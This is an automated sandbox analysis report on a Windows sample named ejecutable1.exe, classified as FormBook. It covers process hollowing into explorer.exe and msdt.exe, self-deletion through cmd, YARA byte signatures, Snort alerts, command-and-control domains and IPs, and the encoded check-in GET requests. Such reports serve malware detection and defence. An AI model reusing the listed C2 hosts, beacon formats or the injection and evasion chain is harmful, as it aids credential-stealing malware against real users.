
Windows Analysis Report ejecutable1.exe

Overview

General Information

Sample Name: ejecutable1.exe
Analysis ID: 491544
MD5: ff2724ddf0ef0525e9e419db5199e96f
SHA1: 3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256: 5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • ejecutable1.exe (PID: 788 cmdline: 'C:\Users\user\Desktop\ejecutable1.exe' MD5: FF2724DDF0EF0525E9E419DB5199E96F)
    • ejecutable1.exe (PID: 2656 cmdline: C:\Users\user\Desktop\ejecutable1.exe MD5: FF2724DDF0EF0525E9E419DB5199E96F)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • msdt.exe (PID: 2632 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
          • cmd.exe (PID: 1172 cmdline: /c del 'C:\Users\user\Desktop\ejecutable1.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2632

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ejecutable1.exe | Virustotal: Detection: 36%
Source: ejecutable1.exe | ReversingLabs: Detection: 13%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: 2.2.ejecutable1.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: ejecutable1.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable1.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb | source: ejecutable1.exe, msdt.exe
Source: Binary string: msdt.pdb | source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe | Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe | Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe | Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe | Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe | Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe | Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe | Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe | Domain query: www.theseattlenotary.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.lianxiwan.xyz
Source: DNS query: www.lianxiwan.xyz
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1 | Host: www.wwiilive.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 | Host: www.dunedinhyperlocal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1 | Host: www.oinfoproduto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1 | Host: www.multicoininvestment.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 | Host: www.theseattlenotary.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1 | Host: www.petersonmovingco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1 | Host: www.quinnwebster.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 15:32:40 GMTServer: nginx/1.19.5Content-Type: text/htmlContent-Length: 583Last-Modified: Sat, 24 Jul 2021 10:05:02 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 
74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: http://business.google.com/
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmp | String found in binary or memory: http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e
Source: explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmp | String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: https://ads.google.com/localservices
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: https://business.google.com
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: https://schema.org/Locuseriness
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp | String found in binary or memory: https://workspace.google.com
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown | DNS traffic detected: queries for: www.wwiilive.com
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1 | Host: www.wwiilive.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 | Host: www.dunedinhyperlocal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1 | Host: www.oinfoproduto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1 | Host: www.multicoininvestment.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1 | Host: www.theseattlenotary.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1 | Host: www.petersonmovingco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1 | Host: www.quinnwebster.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable1.exe, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: ejecutable1.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
